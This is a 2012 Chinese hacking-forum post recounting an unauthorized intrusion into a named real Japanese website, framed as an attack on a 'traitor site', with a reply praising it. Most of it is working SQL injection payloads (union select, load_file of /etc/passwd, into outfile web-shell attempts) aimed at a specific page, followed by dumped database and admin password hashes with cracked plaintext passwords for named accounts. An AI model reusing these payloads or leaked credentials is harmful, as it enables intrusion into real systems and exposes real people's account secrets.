找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3222|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试

4 o3 G" g0 z9 B/ ^9 v2 X0 I; T
) f/ i- w) E, p( c4 P0x01. 检测 www.zuaa.jp 收集数据
4 [6 {# T5 j  Q& {; |  {) |/ U  ~( k3 Q8 W  A- ?. B- ]. }

3 _7 ~5 o5 I. A4 ]2 a% R$ dwhatweb
( k: I" d1 N8 j2 l/ R7 a: C8 u7 R
5 d/ T$ o0 H" k' R! w: u
/ G. u5 m* e( _  Z6 V( K利用NMAP扫描
' `5 z/ j! l8 h5 K+ v4 g" A( }
- s7 l" {* H! z; b. Z4 i, I+ J中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
! \# u5 ^7 L2 O8 H0x02.找注入点
7 |! {: ]. @) s5 u! C找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
7 v) g; b* M) G* A, Z- V  }/ N2 s6 O9 V3 i

2 P- \% I( l1 v; l  \+ _( ~0x03.order by
) p' V2 ^2 F5 v# p             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 17 o' G% }2 U0 {+ P, ?

8 k# I+ ~# q: R" R% worder by 28报错,order by 27正常3 @' J. Q; d. W# s
1 Y- m2 H) E2 d: U* H; Y* g
0x04.   union手动查询
! S0 V8 o6 f' j' |http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 7 P' ]( F, `. }3 R% n
添加到 27 时正常显示 " Z/ r# c* l) b
% x4 k5 T5 ?& e! {5 k2 v
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持4 |9 x% x6 V/ V) H6 S; J8 F

  ?( |  |; d% Q. H/ {" R0 {0x05. info:
4 Q9 n, A( ?7 @) _6 ghttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
) Y; b7 c5 G9 w4 [7 M% V: x  O& `; G. p) e0 Q2 d: z
user:            root@localhost$ `( i* s* C! h2 o" R
database:    openpne
* E) e' J! F5 iversion:      4.1.221 w' c0 v8 }7 k2 z. k
os:             portbld-freebsd5.40 M) e" j( w( u# X: ?
& ~* q' v4 w1 r" ^7 ^" L
0x06. root用户
$ I, \7 f2 D. y* b" {$ Z5 w利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)) u* C1 `" J$ @* |' o; y: y
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ; j+ e: j+ W: P% {
/ J7 d9 h3 P+ ~, a
通过工具转换0 u1 i" S# @; \) a, v  i0 X3 l
* H2 P  p; c+ P" A0 k
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持5 o/ q* C4 o1 C

. e: B, O1 ~$ P0x07. 利用 into outfile" K5 N/ A& L* K; R' E  |
全部都失败
6 J' r: t  b, b8 Rhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
3 f2 J9 _  I! B1 g5 O# U" a, f
; c/ b) W/ k: F+ x* V' Ihttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php , {- c* q5 B2 i8 C1 e! O" O4 O7 Y
% ?9 U' J1 L! P2 H4 `" f0 a
页面显示“MDB2 Error:syntax error”2 t2 B! V0 k$ X, S6 d

8 R* X) j, a# j4 U" ]- ~0x08. 利用 mysql 4.1: z. N5 Z  z9 o2 S- u! n, }8 H# @( L
猜常规表名,字段未果 工具 sqlmap
* K$ t  O- L+ d+ b# g中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持* q- d/ h' L( ?4 h4 K( V3 q% n
( U# h4 V: b# d; @7 n1 O
3 j) q5 T+ H* h. M4 J

& i$ D  T; @0 u% r0x09. 查找后台, a8 M3 x4 z4 [, l# p
利用 现有的各种 后台工具尝试都不行3 H# v0 ^$ U; }5 R4 Y* |
) ?( H+ `3 u/ F8 Z2 F$ ~6 m
0x10.  MySL外联方法
  K0 a1 }1 N# p9 W5 o从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
) c/ ]' X! W" D& \- V, s可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user% g8 V0 ?3 G/ @
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
/ _9 i7 `6 H, y8 e" V% P; [. n2 g/ U8 G. x+ o
这个可以在 www.cmd5.com 解密
& B4 f7 U5 Q7 ?* Iroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa20098 U* X- p' B& F: e. `  h
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
% b+ E0 i: t( I% W. @openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???6 l  [3 _6 y# u
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
( R& Y- S  o: m* n8 t" U工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知% i' a( A1 h" [- l6 I  I' X; u
) ~/ |8 U# c) _( |3 ]9 k9 {

! m& _  b2 S$ d# b' A2 S0x11. 网站突破
6 }3 r( ]3 q7 h% |  I发现网站的源程序 openpne, google 下载 openpne 源码
; G0 M. ~+ p! q  k$ G
$ W$ b# {; @- [9 r- q$ U* q% J; z0 ^/ H# B8 i: g% i
0x12. 默认信息利用8 A5 k" L' o! t$ Q4 `
http://sns.zuaa.jp/?m=admin&a=page_login# q0 W' M$ O% ^, I3 }

. W0 T2 `9 `( z2 o表名 (c_admin_user) ,字段名(username,password)% x8 s: M% P5 d8 p
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user- q/ n0 S* c  W& T- a

) h( M/ O8 |# u, L解密6 E# Y7 ~) P9 v8 F+ q% P$ j
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
* H7 @3 M) A6 U; \6 O3 i' zzuaajp:c0923ec5857796a393da99905008c176,          zju1897
: x  H/ c: {. y  g; G+ h: t8 Q7 R2 Y! S) U, o5 G
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持' |9 O0 N) J$ t  G, @2 f0 _3 c
7 i8 ^' D& L; v8 N$ ~& \) G. j
0x13. 登录后台4 a# K6 l' a% a
  Z8 O6 L) ?( `
9 ]+ C! l5 n- T: y/ a$ ^

, e! k  g( t" _$ C9 y0x14. 小结
6 t% X& Z  i8 x* q利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。  _6 Z/ [! V, k3 i
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点/ R4 s4 E! s% p! n; S  x" y+ w9 n7 r" s
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain* ^4 q. {+ F$ W/ ?& V
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
+ r: x: q' [  a
8 z$ |0 C0 w6 a3 B; h  r最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
& B  I; ^3 B, N( a7 _) k

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表